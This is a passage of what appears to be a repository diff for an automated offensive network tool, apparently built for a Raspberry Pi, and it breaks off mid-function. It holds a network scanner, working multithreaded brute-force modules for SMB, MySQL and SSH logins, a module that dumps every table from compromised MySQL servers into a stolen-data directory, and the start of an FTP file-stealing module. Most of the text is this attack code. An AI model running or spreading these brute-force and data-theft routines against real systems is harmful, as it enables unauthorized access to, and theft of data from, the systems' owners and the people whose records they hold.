Helper class to update the live status of hosts and clean up scan results.
"""
def __init__(self, source_csv_path, output_csv_path):
self.logger = logger
self.source_csv_path = source_csv_path
self.output_csv_path = output_csv_path
def read_csv(self):
"""
Reads the source CSV file into a DataFrame.
"""
try:
self.df = pd.read_csv(self.source_csv_path)
except Exception as e:
self.logger.error(f"Error in read_csv: {e}")
def calculate_open_ports(self):
"""
Calculates the total number of open ports for alive hosts.
"""
try:
alive_df = self.df[self.df['Alive'] == 1].copy()
alive_df.loc[:, 'Ports'] = alive_df['Ports'].fillna('')
alive_df.loc[:, 'Port Count'] = alive_df['Ports'].apply(lambda x: len(x.split(';')) if x else 0)
self.total_open_ports = alive_df['Port Count'].sum()
except Exception as e:
self.logger.error(f"Error in calculate_open_ports: {e}")
def calculate_hosts_counts(self):
"""
Calculates the total and alive host counts.
"""
try:
# self.all_known_hosts_count = self.df.shape[0]
self.all_known_hosts_count = self.df[self.df['MAC Address'] != 'STANDALONE'].shape[0]
self.alive_hosts_count = self.df[self.df['Alive'] == 1].shape[0]
except Exception as e:
self.logger.error(f"Error in calculate_hosts_counts: {e}")
def save_results(self):
"""
Saves the calculated results to the output CSV file.
"""
try:
if os.path.exists(self.output_csv_path):
results_df = pd.read_csv(self.output_csv_path)
results_df.loc[0, 'Total Open Ports'] = self.total_open_ports
results_df.loc[0, 'Alive Hosts Count'] = self.alive_hosts_count
results_df.loc[0, 'All Known Hosts Count'] = self.all_known_hosts_count
results_df.to_csv(self.output_csv_path, index=False)
else:
self.logger.error(f"File {self.output_csv_path} does not exist.")
except Exception as e:
self.logger.error(f"Error in save_results: {e}")
def update_livestatus(self):
"""
Updates the live status of hosts and saves the results.
"""
try:
self.read_csv()
self.calculate_open_ports()
self.calculate_hosts_counts()
self.save_results()
self.logger.info("Livestatus updated")
self.logger.info(f"Results saved to {self.output_csv_path}")
except Exception as e:
self.logger.error(f"Error in update_livestatus: {e}")
def clean_scan_results(self, scan_results_dir):
"""
Cleans up old scan result files, keeping only the most recent ones.
"""
try:
files = glob.glob(scan_results_dir + '/*')
files.sort(key=os.path.getmtime)
for file in files[:-20]:
os.remove(file)
self.logger.info("Scan results cleaned up")
except Exception as e:
self.logger.error(f"Error in clean_scan_results: {e}")
def scan(self):
"""
Initiates the network scan, updates the netkb file, and displays the results.
"""
try:
self.shared_data.bjornorch_status = "NetworkScanner"
self.logger.info(f"Starting Network Scanner")
network = self.get_network()
self.shared_data.bjornstatustext2 = str(network)
portstart = self.shared_data.portstart
portend = self.shared_data.portend
extra_ports = self.shared_data.portlist
scanner = self.ScanPorts(self, network, portstart, portend, extra_ports)
ip_data, open_ports, all_ports, csv_result_file, netkbfile, alive_ips = scanner.start()
alive_macs = set(ip_data.mac_list)
table = Table(title="Scan Results", show_lines=True)
table.add_column("IP", style="cyan", no_wrap=True)
table.add_column("Hostname", style="cyan", no_wrap=True)
table.add_column("Alive", style="cyan", no_wrap=True)
table.add_column("MAC Address", style="cyan", no_wrap=True)
for port in all_ports:
table.add_column(f"{port}", style="green")
netkb_data = []
for ip, ports, hostname, mac in zip(ip_data.ip_list, open_ports.values(), ip_data.hostname_list, ip_data.mac_list):
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
alive = '1' if mac in alive_macs else '0'
row = [ip, hostname, alive, mac] + [Text(str(port), style="green bold") if port in ports else Text("", style="on red") for port in all_ports]
table.add_row(*row)
netkb_data.append([mac, ip, hostname, ports])
with self.lock:
with open(csv_result_file, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(["IP", "Hostname", "Alive", "MAC Address"] + [str(port) for port in all_ports])
for ip, ports, hostname, mac in zip(ip_data.ip_list, open_ports.values(), ip_data.hostname_list, ip_data.mac_list):
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
alive = '1' if mac in alive_macs else '0'
writer.writerow([ip, hostname, alive, mac] + [str(port) if port in ports else '' for port in all_ports])
self.update_netkb(netkbfile, netkb_data, alive_macs)
if self.displaying_csv:
self.display_csv(csv_result_file)
source_csv_path = self.shared_data.netkbfile
output_csv_path = self.shared_data.livestatusfile
updater = self.LiveStatusUpdater(source_csv_path, output_csv_path)
updater.update_livestatus()
updater.clean_scan_results(self.shared_data.scan_results_dir)
except Exception as e:
self.logger.error(f"Error in scan: {e}")
def start(self):
"""
Starts the scanner in a separate thread.
"""
if not self.running:
self.running = True
self.thread = threading.Thread(target=self.scan)
self.thread.start()
logger.info("NetworkScanner started.")
def stop(self):
"""
Stops the scanner.
"""
if self.running:
self.running = False
if self.thread.is_alive():
self.thread.join()
logger.info("NetworkScanner stopped.")
if __name__ == "__main__":
shared_data = SharedData()
scanner = NetworkScanner(shared_data)
scanner.scan()

261
actions/smb_connector.py Normal file
View File

@@ -0,0 +1,261 @@
"""
smb_connector.py - This script performs a brute force attack on SMB services (port 445) to find accessible shares using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import threading
import logging
import time
from subprocess import Popen, PIPE
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from smb.SMBConnection import SMBConnection
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="smb_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SMBBruteforce"
b_module = "smb_connector"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
# List of generic shares to ignore
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""
Class to handle the SMB brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_connector = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""
Run the SMB brute force attack on the given IP and port.
"""
return self.smb_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
self.shared_data.bjornorch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.smbfile = shared_data.smbfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.smbfile):
logger.info(f"File {self.smbfile} does not exist. Creating...")
with open(self.smbfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,Share,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SMB ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
def smb_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SMB service using the given credentials.
"""
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible_shares = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible_shares.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
conn.close()
return accessible_shares
except Exception as e:
return []
def smbclient_l(self, adresse_ip, user, password):
"""
Attempt to list shares using smbclient -L command.
"""
command = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
logger.info(stdout.decode())
shares = self.parse_shares(stdout.decode())
return shares
else:
logger.error(f"Failed authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
return []
except Exception as e:
logger.error(f"Error executing command '{command}': {e}")
return []
def parse_shares(self, smbclient_output):
"""
Parse the output of smbclient -L to get the list of shares.
"""
shares = []
lines = smbclient_output.splitlines()
for line in lines:
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts and parts[0] not in IGNORED_SHARES:
shares.append(parts[0])
return shares
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Share: {share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SMB...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
# If no success with direct SMB connection, try smbclient -L
if not success_flag[0]:
logger.info(f"No successful authentication with direct SMB connection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
progress.update(task_id, advance=1)
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials for IP: {adresse_ip} | User: {user} | Share: {share} using smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if self.shared_data.timewait_smb > 0:
time.sleep(self.shared_data.timewait_smb) # Wait for the specified interval before the next attempt
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'Share', 'User', 'Password', 'Port'])
df.to_csv(self.smbfile, index=False, mode='a', header=not os.path.exists(self.smbfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.smbfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.smbfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
smb_bruteforce = SMBBruteforce(shared_data)
logger.info("[bold green]Starting SMB brute force attack on port 445[/bold green]")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
smb_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successful attempts: {len(smb_bruteforce.smb_connector.results)}")
exit(len(smb_bruteforce.smb_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

204
actions/sql_connector.py Normal file
View File

@@ -0,0 +1,204 @@
import os
import pandas as pd
import pymysql
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SQLBruteforce"
b_module = "sql_connector"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
class SQLBruteforce:
"""
Class to handle the SQL brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_connector = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""
Run the SQL brute force attack on the given IP and port.
"""
return self.sql_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.load_scan_file()
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sqlfile = shared_data.sqlfile
if not os.path.exists(self.sqlfile):
with open(self.sqlfile, "w") as f:
f.write("IP Address,User,Password,Port,Database\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the scan file and filter it for SQL ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3306", na=False)]
def sql_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SQL service using the given credentials without specifying a database.
"""
try:
# Première tentative sans spécifier de base de données
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
# Si la connexion réussit, récupérer la liste des bases de données
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
conn.close()
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
# Sauvegarder les informations avec la liste des bases trouvées
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
# Ajouter une entrée pour chaque base de données trouvée
for db in databases:
self.results.append([adresse_ip, user, password, port, db])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file()
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SQL...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['IP Address', 'User', 'Password', 'Port', 'Database'])
df.to_csv(self.sqlfile, index=False, mode='a', header=not os.path.exists(self.sqlfile))
logger.info(f"Saved results to {self.sqlfile}")
self.results = []
def remove_duplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sqlfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sqlfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
sql_bruteforce = SQLBruteforce(shared_data)
logger.info("[bold green]Starting SQL brute force attack on port 3306[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
sql_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(sql_bruteforce.sql_connector.results)}")
exit(len(sql_bruteforce.sql_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

198
actions/ssh_connector.py Normal file
View File

@@ -0,0 +1,198 @@
"""
ssh_connector.py - This script performs a brute force attack on SSH services (port 22) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import paramiko
import socket
import threading
import logging
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_connector"
b_status = "brute_force_ssh"
b_port = 22
b_parent = None
class SSHBruteforce:
"""
Class to handle the SSH brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_connector = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""
Run the SSH brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "SSHBruteforce"
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sshfile = shared_data.sshfile
if not os.path.exists(self.sshfile):
logger.info(f"File {self.sshfile} does not exist. Creating...")
with open(self.sshfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SSH ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
def ssh_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SSH service using the given credentials.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(adresse_ip, username=user, password=password, banner_timeout=200) # Adjust timeout as necessary
return True
except (paramiko.AuthenticationException, socket.error, paramiko.SSHException):
return False
finally:
ssh.close() # Ensure the SSH connection is closed
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ssh_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SSH...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.sshfile, index=False, mode='a', header=not os.path.exists(self.sshfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sshfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sshfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("Démarrage de l'attaque SSH... sur le port 22")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing SSHBruteforce on {ip}...")
ssh_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(ssh_bruteforce.ssh_connector.results)}")
exit(len(ssh_bruteforce.ssh_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

189
actions/steal_data_sql.py Normal file
View File

@@ -0,0 +1,189 @@
import os
import pandas as pd
import logging
import time
from sqlalchemy import create_engine
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealDataSQL"
b_module = "steal_data_sql"
b_status = "steal_data_sql"
b_parent = "SQLBruteforce"
b_port = 3306
class StealDataSQL:
"""
Class to handle the process of stealing data from SQL servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
logger.info("StealDataSQL initialized.")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_sql(self, ip, username, password, database=None):
"""
Establish a MySQL connection using SQLAlchemy.
"""
try:
# Si aucune base n'est spécifiée, on se connecte sans base
db_part = f"/{database}" if database else ""
connection_str = f"mysql+pymysql://{username}:{password}@{ip}:3306{db_part}"
engine = create_engine(connection_str, connect_args={"connect_timeout": 10})
self.sql_connected = True
logger.info(f"Connected to {ip} via SQL with username {username}" + (f" to database {database}" if database else ""))
return engine
except Exception as e:
logger.error(f"SQL connection error for {ip} with user '{username}' and password '{password}'" + (f" to database {database}" if database else "") + f": {e}")
return None
def find_tables(self, engine):
"""
Find all tables in all databases, excluding system databases.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Table search interrupted due to orchestrator exit.")
return []
query = """
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
AND TABLE_TYPE = 'BASE TABLE'
"""
df = pd.read_sql(query, engine)
tables = df[['TABLE_NAME', 'TABLE_SCHEMA']].values.tolist()
logger.info(f"Found {len(tables)} tables across all databases")
return tables
except Exception as e:
logger.error(f"Error finding tables: {e}")
return []
def steal_data(self, engine, table, schema, local_dir):
"""
Download data from the table in the database to a local file.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Data stealing process interrupted due to orchestrator exit.")
return
query = f"SELECT * FROM {schema}.{table}"
df = pd.read_sql(query, engine)
local_file_path = os.path.join(local_dir, f"{schema}_{table}.csv")
df.to_csv(local_file_path, index=False)
logger.success(f"Downloaded data from table {schema}.{table} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading data from table {schema}.{table}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal data from the remote SQL server.
"""
try:
if 'success' in row.get(self.b_parent_action, ''):
self.shared_data.bjornorch_status = "StealDataSQL"
time.sleep(5)
logger.info(f"Stealing data from {ip}:{port}...")
sqlfile = self.shared_data.sqlfile
credentials = []
if os.path.exists(sqlfile):
df = pd.read_csv(sqlfile)
# Filtrer les credentials pour l'IP spécifique
ip_credentials = df[df['IP Address'] == ip]
# Créer des tuples (username, password, database)
credentials = [(row['User'], row['Password'], row['Database'])
for _, row in ip_credentials.iterrows()]
logger.info(f"Found {len(credentials)} credential combinations for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
if not self.sql_connected:
logger.error(f"No SQL connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout)
timer.start()
success = False
for username, password, database in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal data execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip} on database {database}")
# D'abord se connecter sans base pour vérifier les permissions globales
engine = self.connect_sql(ip, username, password)
if engine:
tables = self.find_tables(engine)
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"sql/{mac}_{ip}/{database}")
os.makedirs(local_dir, exist_ok=True)
if tables:
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
break
# Se connecter à la base spécifique pour le vol de données
db_engine = self.connect_sql(ip, username, password, schema)
if db_engine:
self.steal_data(db_engine, table, schema, local_dir)
success = True
counttables = len(tables)
logger.success(f"Successfully stolen data from {counttables} tables on {ip}:{port}")
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Error stealing data from {ip} with user '{username}' on database {database}: {e}")
if not success:
logger.error(f"Failed to steal any data from {ip}:{port}")
return 'failed'
else:
return 'success'
else:
logger.info(f"Skipping {ip} as it was not successfully bruteforced")
return 'skipped'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
def b_parent_action(self, row):
"""
Get the parent action status from the row.
"""
return row.get(b_parent, {}).get(b_status, '')
if __name__ == "__main__":
shared_data = SharedData()
try:
steal_data_sql = StealDataSQL(shared_data)
logger.info("[bold green]Starting SQL data extraction process[/bold green]")
# Load the IPs to process from shared data
ips_to_process = shared_data.read_data()
# Execute data theft on each IP
for row in ips_to_process:
ip = row["IPs"]
steal_data_sql.execute(ip, b_port, row, b_status)
except Exception as e:
logger.error(f"Error in main execution: {e}")

198
actions/steal_files_ftp.py Normal file
View File

@@ -0,0 +1,198 @@
"""
steal_files_ftp.py - This script connects to FTP servers using provided credentials or anonymous access, searches for specific files, and downloads them to a local directory.
"""
import os
import logging
import time
from rich.console import Console
from threading import Timer
from ftplib import FTP
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesFTP"
b_module = "steal_files_ftp"
b_status = "steal_files_ftp"
b_parent = "FTPBruteforce"
b_port = 21
class StealFilesFTP:
"""
Class to handle the process of stealing files from FTP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
logger.info("StealFilesFTP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_ftp(self, ip, username, password):
"""
Establish an FTP connection.
"""
try:
ftp = FTP()
ftp.connect(ip, 21)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP with username {username}")
return ftp
except Exception as e:
logger.error(f"FTP connection error for {ip} with user '{username}' and password '{password}': {e}")
return None
def find_files(self, ftp, dir_path):
"""
Find files in the FTP share based on the configuration criteria.
"""
files = []
try:
ftp.cwd(dir_path)
items = ftp.nlst()
for item in items:
try:
ftp.cwd(item)
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
ftp.cwd('..')
except Exception:
if any(item.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in item for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, item))
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"Error accessing path {dir_path} on FTP: {e}")
return files
def steal_file(self, ftp, remote_file, local_dir):
"""
Download a file from the FTP server to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
ftp.retrbinary(f'RETR {remote_file}', f.write)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from FTP: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the FTP server.
"""
try:
